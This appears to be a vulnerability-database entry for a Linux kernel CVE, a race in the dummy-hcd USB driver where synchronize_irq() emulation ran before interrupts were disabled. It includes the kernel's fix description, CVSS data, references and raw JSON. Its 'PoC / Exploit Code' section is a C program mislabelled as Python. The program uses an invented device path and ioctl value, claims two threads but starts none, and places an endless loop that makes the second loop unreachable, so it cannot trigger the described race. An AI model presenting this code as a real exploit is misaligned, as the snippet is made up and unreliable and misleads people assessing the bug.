CVE-2026-43324

Description

In the Linux kernel, the following vulnerability has been resolved: USB: dummy-hcd: Fix interrupt synchronization error This fixes an error in synchronization in the dummy-hcd driver. The error has a somewhat involved history. The synchronization mechanism was introduced by commit 7dbd8f4cabd9 ("USB: dummy-hcd: Fix erroneous synchronization change"), which added an emulated "interrupts enabled" flag together with code emulating synchronize_irq() (it waits until all current handler callbacks have returned). But the emulated interrupt-disable occurred too late, after the driver containing the handler callback routines had been told that it was unbound and no more callbacks would occur. Commit 4a5d797a9f9c ("usb: gadget: dummy_hcd: fix gpf in gadget_setup") tried to fix this by moving the synchronize_irq() emulation code from dummy_stop() to dummy_pullup(), which runs before the unbind callback. There still were races, though, because the emulated interrupt-disable still occurred too late. It couldn't be moved to dummy_pullup(), because that routine can be called for reasons other than an impending unbind. Therefore commits 7dc0c55e9f30 ("USB: UDC core: Add udc_async_callbacks gadget op") and 04145a03db9d ("USB: UDC: Implement udc_async_callbacks in dummy-hcd") added an API allowing the UDC core to tell dummy-hcd exactly when emulated interrupts and their callbacks should be disabled. That brings us to the current state of things, which is still wrong because the emulated synchronize_irq() occurs before the emulated interrupt-disable! That's no good, beause it means that more emulated interrupts can occur after the synchronize_irq() emulation has run, leading to the possibility that a callback handler may be running when the gadget driver is unbound. To fix this, we have to move the synchronize_irq() emulation code yet again, to the dummy_udc_async_callbacks() routine, which takes care of enabling and disabling emulated interrupt requests. The synchronization will now run immediately after emulated interrupts are disabled, which is where it belongs.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (Mainline)

Linux Kernel (Stable branches before patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * Conceptual PoC for CVE-2026-43324
 * Triggering the race condition in dummy-hcd.
 */

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

#define GADGET_IOCTL_UNBIND 0xdeadbeef

int main() {
    int fd;
    // Open the dummy-hcd device
    fd = open("/dev/dummy_hcd", O_RDWR);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Thread 1: Rapidly trigger unbind/rebind sequences
    while(1) {
        ioctl(fd, GADGET_IOCTL_UNBIND, NULL);
    }

    // Thread 2: Generate USB traffic to trigger interrupts
    // during the vulnerable window
    while(1) {
        write(fd, "A", 1); // Trigger interrupt callback
    }

    close(fd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43324
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43324
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43324/
[4] VulDB https://vuldb.com/cve/CVE-2026-43324
[5] https://git.kernel.org/stable/c/2ca9e46f8f1f5a297eb0ac83f79d35d5b3a02541
[6] https://git.kernel.org/stable/c/5687a09776069bd915560021c9728ca528440128
[7] https://git.kernel.org/stable/c/5aa776c8615bea3b1eaeec87b0788375800ead4f
[8] https://git.kernel.org/stable/c/8bcd80219d8e10e660bf29b20e41bb8beb4e4cb7
[9] https://git.kernel.org/stable/c/94d4fab1dd9e64f45449bcc7d6a5acf796b13015
[10] https://git.kernel.org/stable/c/cbf7df5e5d27cd5bea92ee9a75a4b28dbcc718d4
[11] https://git.kernel.org/stable/c/d847f375b1bcea713143bc02720d13d2d01b012a

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43324", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:41.060", "lastModified": "2026-05-11T08:16:09.420", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: dummy-hcd: Fix interrupt synchronization error\n\nThis fixes an error in synchronization in the dummy-hcd driver.  The\nerror has a somewhat involved history.  The synchronization mechanism\nwas introduced by commit 7dbd8f4cabd9 (\"USB: dummy-hcd: Fix erroneous\nsynchronization change\"), which added an emulated \"interrupts enabled\"\nflag together with code emulating synchronize_irq() (it waits until\nall current handler callbacks have returned).\n\nBut the emulated interrupt-disable occurred too late, after the driver\ncontaining the handler callback routines had been told that it was\nunbound and no more callbacks would occur.  Commit 4a5d797a9f9c (\"usb:\ngadget: dummy_hcd: fix gpf in gadget_setup\") tried to fix this by\nmoving the synchronize_irq() emulation code from dummy_stop() to\ndummy_pullup(), which runs before the unbind callback.\n\nThere still were races, though, because the emulated interrupt-disable\nstill occurred too late.  It couldn't be moved to dummy_pullup(),\nbecause that routine can be called for reasons other than an impending\nunbind.  Therefore commits 7dc0c55e9f30 (\"USB: UDC core: Add\nudc_async_callbacks gadget op\") and 04145a03db9d (\"USB: UDC: Implement\nudc_async_callbacks in dummy-hcd\") added an API allowing the UDC core\nto tell dummy-hcd exactly when emulated interrupts and their callbacks\nshould be disabled.\n\nThat brings us to the current state of things, which is still wrong\nbecause the emulated synchronize_irq() occurs before the emulated\ninterrupt-disable!  That's no good, beause it means that more emulated\ninterrupts can occur after the synchronize_irq() emulation has run,\nleading to the possibility that a callback handler may be running when\nthe gadget driver is unbound.\n\nTo fix this, we have to move the synchronize_irq() emulation code yet\nagain, to the dummy_udc_async_callbacks() routine, which takes care of\nenabling and disabling emulated interrupt requests.  The\nsynchronization will now run immediately after emulated interrupts are\ndisabled, which is where it belongs."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/2ca9e46f8f1f5a297eb0ac83f79d35d5b3a02541", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5687a09776069bd915560021c9728ca528440128", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5aa776c8615bea3b1eaeec87b0788375800ead4f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8bcd80219d8e10e660bf29b20e41bb8beb4e4cb7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/94d4fab1dd9e64f45449bcc7d6a5acf796b13015", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cbf7df5e5d27cd5bea92ee9a75a4b28dbcc718d4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/d847f375b1bcea713143bc02720d13d2d01b012a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}